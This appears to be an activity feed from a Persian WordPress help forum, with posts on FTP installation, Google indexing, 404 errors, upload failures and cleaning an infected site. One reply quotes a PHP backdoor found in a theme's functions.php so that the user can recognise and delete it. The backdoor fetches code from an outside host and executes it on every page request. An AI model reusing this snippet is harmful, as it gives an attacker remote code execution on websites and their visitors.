• اطلاعیه ها

    • Morteza

      باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

      تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس

تمامی فعالیت ها

این جریان به طور خودکار بروز می شود   

  1. دیروز
  2. هیچ پوشه ای نیست روت خالی هست. تو پنل نمیتونم برم
  3. سلام. خوب توی همون پوشه کپی کنید فایل ها رو البته کار زمان بریه مگر اینکه زیپ شدش رو بریزید بعد از توی پنل انزیپ کنید !
  4. برا سایت هایی که مشتری از چندین مکان دنیا دارن مثل سایت امازون و .... hreflang لازمه لوکیشن رو بهتره ست نکنید کلا(بهش دست نزنید با تجربه قبلیم می گم)
  5. گوگل با دامین شما که پدرکشتگی نداره همین محتوا رو ببرین تو یه دامین دیگه بعد یه مدت دیگه اون رو هم اسپم می کنه وقت و هزینتو بهتره هدر ندین ولی اگه باز مایل هستید حتما یه اکانت جی میل دیگه برا ثبت سایت جدید استفاده کنید و اینکه دیگه ریدایرکتی از دامین قبلی به جدید انجام ندین مثل اینکه یه سایت جدید زدین و دارین محتوا تولید می کند
  6. با سلام میخوام از طریق آدرس ftp ورد پرس رو روی هاست بالا بیارم. Filezilla رو هم نصب کردم و وارد سرور شدم ولی قسمت remote خالی هست و نمیدونم چجوری از طریق filezilla میشه وردپرس رو نصب و راه اندازی کرد
  7. تست کنید https://bigtheme.ir/an-error-has-occurred-while-loading-file/ https://mihanwp.com/upload-media-error/
  8. صفحه اصلی رو پیدا کردم ولی وقتی ویرایش با visual composer رو میزنم یه صفحه خالی باز میشه،که اصلا محتویاتی که داخل صفحه اصلی سایت هست داخلش نداره،صفحه ساز خود قالب رو میتونم از قسمت برگه ها ببینم؟
  9. با سلام وقتی میخوام یک تصویر رو آپلود کنم ، با این پیغام روبرو میشم خطایی هنگام بارگذاری پرونده آمده . دوباره تلاش کنید ، هر چند که تصویر درون کتابخانه رسانه اپلود میشه ، اما نمیتونم همونجا تو مطلب تصویر رو قرار بدم . احتمال میدم برای تم باشه. تم رو با قیمت بالا خریداری کردم. اگر کسی راه حلی داره منو از ایم مخمصه دربیاره ممنون میشم
  10. سایت های جدید ایندکسشون یکم زمانبره به مرور گوگل به سایتتون اعتماد می کنه و زودتر ایندکس می کنه همونطور که دوستان گفتن برا ایندکس سریع از ابزار Fetch As Google داخل کنسول استفاده کنید
  11. linked from یعنی این لینک شکسته داخل اون صفحات هم بوده یا احتمالا هست داخل سایت مپ هم بوده الان یا با افزونه ریدایرکت یکی یکی بشین لینک های شکسته رو به لینک صحیح ریدایرکت کن یا از ایندکس گوکل(تو کنسول گوگل هست Remove URLsقبلش تو نت در موردش بخون سایتو نترکونی ) حذفشون کن- بعد از انجام هرکدوم از مراحل قبل بیا تو قسمت ارور ها mark as fixed بکن.
  12. ممنونم من این ۲۰۶ تا رو نگا کردم فقط از این قسمت که عکس گرفتم متوجه نشدم رو بعضی از لینک های ارور دار این بخش linked from چند تا لینک دیگه هم توشون هست که متوجه نشدم منظور چی هست فقط من ندونستم علت این ارور ۴۰۴ رو کجاش مینویسه ؟‌ Error details رو نگا کردم فقط نوشته که این صفحات رو بهتره درست کنید و ... هیچ علت خاصی ننوشته بود که چرا اینطوره همه رو دس جمعه بزنم فیکس شن ؟‌ تو بخش تنظیمات افزونه سئو هم عکس رو فرستادم آیا این طور باید باشه ؟‌ اصلا منظورتون این قسمت هست ؟‌
  13. با به روز رسانی وردپرس فارسی به ندرت پیش می یاد تغییری در سایتتون ایجاد بشه ولی اگه ووکامرس رو آپدیت کنید. حتما این اتفاق خواهد افتاد.
  14. مجددا سپاس دوست عزیز راستش سایتم یک سال درحال کاکردن بود.. درسته . مطالب کپی هستن . و اسمپم شده سایت. متوجه منظورتون از جمله : آدرس Canonical براشون ست کنید نشدم ً امکانش هست بگین چطور کنسول ست کنم براشون؟ قالبم قالبی هست ک 80 درصد سایتها استفاده میکنن . هیچ اروری در گوگل وبمستر ندارم. چند هفته !!!؟ من چون امیدی ندارم برای اینکه گوگل سایتم را از اسپم در بیاره برای همین میخواستم مطالب ها را انتقا ل بدم و قید دامنه و. .. را بزنم .اما با صحبتها وتوضیحات شما امیدوارم شدم ممنون
  15. تا اونجایی که من اطلاع دارم سایت مپ کمی دیر به دیر اپدیت میشه و خب قسمت جداگانه ای برای خودشه یعنی اینکه گزارش لینک هایی رو میده که از طریق سایت مپ ایندکس شده نه لینک هایی که از طریق بخش های دیگه!
  16. با اون 206 تا 404 فکر نکنم دیگه ایندکسی انجام بشه از طرف گوگل! همینطور درافزونه سئو بررسی کنید تیک ایندکس پستها رو زده باشین تا ایندکس بشن . برای درست کردن ارور 404 میتونین مارک فیکس mark as fixed را بزنین . البته قبلش باید بررسی کنید این ارور ها برای چی بوده .روی لینک های 404 کلیک کنید تا مشخص بشه/
  17. چرا در سایت مپ نشون نمیده ؟ مگه سایت مپ نباید این نوع فعالیت ها رو گزارش بده؟
  18. ظاهرا مشکل از همون کد بوده فعلا که رفع شده چون من با همه مواردی که داشتم تست کردم موبایل vps و ... حالا شاید اینا کش شدن ...
  19. بنده الان وبسایت شما رو دوباره نگاه کردم ، کد های مخرب وجود نداشت، مشکلتون حل شده ؟
  20. آندرستند ممنون از کمکی که کردین حتی دو گیگ کل سایتو دانلود کردم ولی هیچی نیافتم :/
  21. دوست عزیز اگر مشکلتون حل شد اعلام کنید تا دوستان هم اگر مشکلی هم سان شما داشتند، کارشون راه بیفته
  22. اگر همش اضافه شده پس همش رو از تمامی فایل هایی که اضافه کرده پاک کنید و کش رو پاک کنید ببیند درست میشه یا نه !(حتما قبلا از تمام فایل هایی که ویرایش میکنید بکاپ بگیرید !!!!!!!!!!!!!)
  23. همش اضافه شده ... این تمام کدهای اون قسمت نیست اینا اضافه شدن من با بکاپ روی هاست چک میکردم جالبه کل بکاپ ها رو ویرایش کرده اینو اضافه کرده با فایل داخل سیستم چک کردم متوجه شدم ولی بازم چک کردم تبلیغه هنوز هست شاید به خاطر کش بوده حالا باز چک کنم ببینم چی میشه
  24. سلام دوست عزیز تا اونجایی که بنده میدونم اگر از طریق بخش Fetch As Google پست ها رو ایندکس میکند در عرض چند ساعت ایندکس میشند(ممکنه که در سایت مپ نشون نده که ایندکس شده ولی اگر سرچ کنید توی گوگل میبینید که براتون میاره و مطلبتون ایندکس شده!)
  25. دقت کنید که فقط قطعه کد پایین رو حذف کنید نه همش رو !: if ( ! function_exists( 'theme_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { if($tmpcontent = @file_get_contents("http://www.plimus.pw/code1.php?i=".$path)) { function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(theme_temp_setup($tmpcontent)); } } }
  26. دوست عزیز اگر این قطعه کد از فایل function.php هست، اون رو حذف کنید و سیو کنید، دوباره وارد صفحه ای که مشکل داره بشید و دکمه های CTRL+F5 رو چند بار فشار بدید و ببنید درست میشه یا نه!(ابتدا از فایل یک بکاپ بگیرید تا اگر مشکلی از این قطعه کد نبود دوباره بتونید درستش کنید !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!)
  1. نمایش فعالیت های بیشتر